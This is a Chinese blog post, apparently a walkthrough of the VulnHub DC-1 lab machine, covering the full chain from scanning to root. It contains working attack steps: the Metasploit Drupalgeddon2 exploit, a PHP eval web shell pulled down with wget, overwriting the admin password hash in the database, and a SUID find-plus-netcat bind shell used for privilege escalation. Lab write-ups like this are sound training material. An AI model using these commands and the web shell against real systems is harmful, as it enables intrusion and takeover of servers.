

<!DOCTYPE html>
<html lang="zh-CN">

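<head>
  <meta charset="utf-8">
  <!-- Zoom stays enabled: maximum-scale=1 / user-scalable=no stop readers from enlarging the page. -->
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>DC:1渗透测试 - TXXJ</title>
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate">

  <meta name="description" content="DC1 渗透测试实验环境：靶机：DC:1 点击下载
攻...">
  <meta name="author" content="TXXJ">

  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <!-- mask-icon is a link relation and the msapplication-* entries are meta names;
       the original "meta rel=..." forms are not valid markup. -->
  <link rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  <meta name="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
  <meta name="msapplication-TileColor" content="#000000">

  <link rel="stylesheet" href="/css/style.css">

  <!-- NOTE(review): the three stylesheets below come from third-party CDNs without
       Subresource Integrity. Self-host them, or add
       integrity="sha384-DIGEST_PLACEHOLDER" crossorigin="anonymous" with a digest
       computed from a copy you have verified. -->
  <!-- Explicit https: instead of a protocol-relative URL, so the file is never fetched over plain HTTP. -->
  <link rel="stylesheet" href="https://at.alicdn.com/t/font_1445822_h1619vhl1nr.css">
  <link rel="stylesheet" href="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.css">
  <link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css">

  <!-- Theme configuration read by the site scripts. The inline block means a strict
       Content-Security-Policy would need a nonce or hash for it. -->
  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: true,
      lazyload: {
        enable: true,
        loadingImage: '',
      },
      donate: {
        enable: true,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      motto: {
        api: '',
        default: '我在开了灯的床头下，想问问自己的心啊。'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        alwaysShow: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: true
      }
    }
  </script>

  <!-- NOTE(review): the generator tag publishes the exact Hexo version; drop it if
       version disclosure is not wanted. -->
  <meta name="generator" content="Hexo 5.2.0">
</head>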
<body class="lock-screen">
  <main id="main">
  <div class="container" id="container">
    <article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/backgroud.png" src=""  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">DC:1渗透测试</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>November 29, 2020</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>1158</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h1 id="DC1-渗透测试"><a href="#DC1-渗透测试" class="headerlink" title="DC1 渗透测试"></a>DC1 渗透测试</h1><h2 id="实验环境："><a href="#实验环境：" class="headerlink" title="实验环境："></a>实验环境：</h2><p>靶机：DC:1 <a target="_blank" rel="noopener" href="https://download.vulnhub.com/dc/DC-1.zip">点击下载</a></p>
<p>攻击机：kali,win10</p>
<h2 id="实验步骤："><a href="#实验步骤：" class="headerlink" title="实验步骤："></a>实验步骤：</h2><ol>
<li>安装靶机</li>
<li>信息收集</li>
<li>漏洞利用</li>
<li>提权</li>
</ol>
<h2 id="实验开始："><a href="#实验开始：" class="headerlink" title="实验开始："></a>实验开始：</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plain">下载靶机<br>安装靶机<br>使用靶机OVA文件在VMware中安装<br>修改靶机网络<br>进入单用户模式重启靶机<br></code></pre></td></tr></table></figure>

<h5 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">ip收集<br>arp-scan -l;<br>nmap -sV <span class="hljs-number">192.168</span><span class="hljs-number">.10</span><span class="hljs-number">.18</span><br></code></pre></td></tr></table></figure>

<h5 id="指纹查询"><a href="#指纹查询" class="headerlink" title="指纹查询"></a>指纹查询</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plain">使用浏览器插件wappalyzer查cms<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.png" src=""  alt="image"></p>
<h3 id="相关漏洞搜寻"><a href="#相关漏洞搜寻" class="headerlink" title="相关漏洞搜寻"></a>相关漏洞搜寻</h3><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">msfconsole</span><br><span class="hljs-attribute">search drupal</span><br></code></pre></td></tr></table></figure>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs routeros">msf攻击<br>use exploit/unix/webapp/drupal_drupalgeddon2<br><span class="hljs-builtin-name">set</span> <span class="hljs-attribute">RHOST</span>=192.168.10.18<br>exploit<br>shell<br>python -c <span class="hljs-string">&quot;import pty;pty.spawn(&#x27;/bin/sh&#x27;)&quot;</span><br></code></pre></td></tr></table></figure>
<h5 id="上传PHP木马"><a href="#上传PHP木马" class="headerlink" title="上传PHP木马"></a>上传PHP木马</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php">先在kali上启动apache2<br>vim /<span class="hljs-keyword">var</span>/www/test.txt<br>    <span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>($_POST[<span class="hljs-string">&#x27;key&#x27;</span>]);<span class="hljs-meta">?&gt;</span><br>在会到msf中<br>wget http:<span class="hljs-comment">//192.168.10.17/test.txt</span><br>cp test.txt test.php<br></code></pre></td></tr></table></figure>
<h5 id="蚁剑链接"><a href="#蚁剑链接" class="headerlink" title="蚁剑链接"></a>蚁剑链接</h5><p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/2.png" src=""  alt="image"></p>
<h5 id="查看配置文件"><a href="#查看配置文件" class="headerlink" title="查看配置文件"></a>查看配置文件</h5><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs gcode">目录中有一个fla<span class="hljs-name">g1.</span>txt<br>在配置文件中有一个fla<span class="hljs-name">g2</span><br>根据提示访问数据库<br></code></pre></td></tr></table></figure>
<h5 id="查看数据库"><a href="#查看数据库" class="headerlink" title="查看数据库"></a>查看数据库</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">利用蚁剑可以直接连接数据库，并直接看到<span class="hljs-keyword">user</span>表<br>得知<span class="hljs-keyword">password</span>字段存的是哈希值（并非可逆加密），如果需要改密码就要用同样的方式生成哈希<br></code></pre></td></tr></table></figure>
<h5 id="修改password-hash-sh"><a href="#修改password-hash-sh" class="headerlink" title="修改password-hash.sh"></a>修改password-hash.sh</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">在蚁剑中执行的时候产生了报错，报错的行在<span class="hljs-number">83</span>，<span class="hljs-number">84</span>行<br>我把文件的路径修改后就能正常执行了<br></code></pre></td></tr></table></figure>
<h5 id="执行password-hash-sh"><a href="#执行password-hash-sh" class="headerlink" title="执行password-hash.sh"></a>执行password-hash.sh</h5><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"><span class="hljs-string">./password-hash.sh</span> root<br></code></pre></td></tr></table></figure>
<h5 id="修改数据数据"><a href="#修改数据数据" class="headerlink" title="修改数据库数据"></a>修改数据库数据</h5><p>在执行过脚本之后就产生了一串hash值，可以直接添加进表中</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">update<span class="hljs-built_in"> users </span><span class="hljs-builtin-name">set</span> password = <span class="hljs-string">&#x27;$S$DOjcjhOiiHtadIneTwIvHAHacQ2dXVvF9xG8Mi8.h8dLGndJMZJY&#x27;</span> where <span class="hljs-attribute">uid</span>=<span class="hljs-string">&#x27;1&#x27;</span>;<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/3.png" src=""  alt="image"></p>
<h5 id="登录主页查看flag3"><a href="#登录主页查看flag3" class="headerlink" title="登录主页查看flag3"></a>登录主页查看flag3</h5><p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/4.png" src=""  alt="image"></p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs arduino">主机信息收集进入<span class="hljs-built_in">home</span>得到flag4<br>cd /<span class="hljs-built_in">home</span>/flag4<br>cat fla*<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/5.png" src=""  alt="image"></p>
<h5 id="提权-拿最终flag"><a href="#提权-拿最终flag" class="headerlink" title="提权,拿最终flag"></a>提权,拿最终flag</h5><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-string">使用find+netcat</span> <br><span class="hljs-string">提权蚁剑：</span>    <br><span class="hljs-string">find</span> <span class="hljs-string">/</span> <span class="hljs-string">-exec</span> <span class="hljs-string">netcat</span> <span class="hljs-string">-lvp</span> <span class="hljs-number">5555</span> <span class="hljs-string">-e</span> <span class="hljs-string">&#x27;/bin/sh&#x27;</span><span class="hljs-string">\;</span><br><span class="hljs-attr">kali:</span>    <span class="hljs-string">nc</span> <span class="hljs-number">192.168</span><span class="hljs-number">.10</span><span class="hljs-number">.18</span> <span class="hljs-number">5555</span>    <br>    <span class="hljs-string">cd</span> <span class="hljs-string">/root/</span>    <br>    <span class="hljs-string">ls</span>    <br>    <span class="hljs-string">cat</span> <span class="hljs-string">thi*</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/6.png" src=""  alt="image"></p>
<h3 id="——实验结束——"><a href="#——实验结束——" class="headerlink" title="——实验结束——"></a>——实验结束——</h3>
      </section>
      <section class="extra">
        
        <ul class="copyright">
  
  <li><strong>本文作者：</strong>TXXJ</li>
  <li><strong>本文链接：</strong><a href="https://txxj.github.io/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html">https://txxj.github.io/DC-1%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/index.html</a></li>
  <li><strong>版权声明：</strong>本博客所有文章均采用<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"
      rel="external nofollow" target="_blank"> BY-NC-SA </a>许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/kali/" rel="tag">kali</a></li></ul>

        

      </section>
      
      
    </section>
  </div>
</article>
  </div>
</main>
  
</body>


<!--
  Script dependencies: jQuery and three jQuery plugins from public CDNs, then
  the theme's own scripts from this site.
  NOTE(review): the four CDN scripts are loaded without Subresource Integrity,
  so the page executes whatever cdn.bootcss.com / cdn.bootcdn.net return.
  Self-host the files, or add integrity="sha384-DIGEST_PLACEHOLDER"
  crossorigin="anonymous" to each tag, with the digest computed from a copy
  you have verified.
  NOTE(review): BootCDN domains were reportedly named in public write-ups of
  the 2024 polyfill.io supply-chain incident; confirm before continuing to
  depend on them.
  NOTE(review): jQuery 3.4.1 is an old release; check it against the jQuery
  project's security advisories.
-->
<script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.min.js"></script>






<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>






<script src="https://cdn.bootcss.com/fancybox/3.5.7/jquery.fancybox.min.js"></script>






<script src="https://cdn.bootcss.com/jquery.pjax/2.0.1/jquery.pjax.min.js"></script>




<!-- Theme scripts served from this site's own origin. -->
<script src="/js/utils.js"></script>
<script src="/js/modules.js"></script>
<script src="/js/zui.js"></script>
<script src="/js/script.js"></script>





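<script>
  // DaoVoice chat-widget loader. Installs a stub at window.daovoice that queues
  // its call arguments in .q, records a load timestamp in .l, then inserts the
  // widget script (async) before the first script element on the page.
  (function (i, s, o, g, r, a, m) {
    i["DaoVoiceObject"] = r;
    i[r] = i[r] || function () {
      (i[r].q = i[r].q || []).push(arguments)
    }, i[r].l = 1 * new Date();
    a = s.createElement(o), m = s.getElementsByTagName(o)[0];
    a.async = 1;
    a.src = g;
    a.charset = "utf-8";
    m.parentNode.insertBefore(a, m)
    // The widget is always fetched over HTTPS. The original copied the page's
    // own scheme, so on an http: page the script travelled in clear text and
    // could be altered in transit.
  })(window, document, "script", "https://widget.daovoice.io/widget/0f81ff2f.js", "daovoice");
  // NOTE(review): "abcdefg" looks like a placeholder app id; confirm the real value.
  daovoice('init', {
    app_id: "abcdefg"
  }, {
    launcher: {
      disableLauncherIcon: true,
    },
  });
  daovoice('update');
</script>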



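<script>
  // Baidu link-submit loader: inserts Baidu's push.js before the first script
  // element on the page.
  (function () {
    var bp = document.createElement('script');
    // Always use the HTTPS endpoint. The original fell back to a plain-HTTP URL
    // on non-HTTPS pages, where the script could be altered in transit.
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
  })();
</script>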


<script>
  // Baidu analytics loader: keeps the global _hmt command queue and inserts
  // hm.js (keyed by the site id in the query string) before the first script
  // element on the page.
  var _hmt = _hmt || [];
  (function () {
    var firstScript = document.getElementsByTagName("script")[0];
    var tracker = document.createElement("script");
    tracker.src = "https://hm.baidu.com/hm.js?4c204d8bc027a0455b5fc642ac334ca8";
    firstScript.parentNode.insertBefore(tracker, firstScript);
  })();
</script>










</html>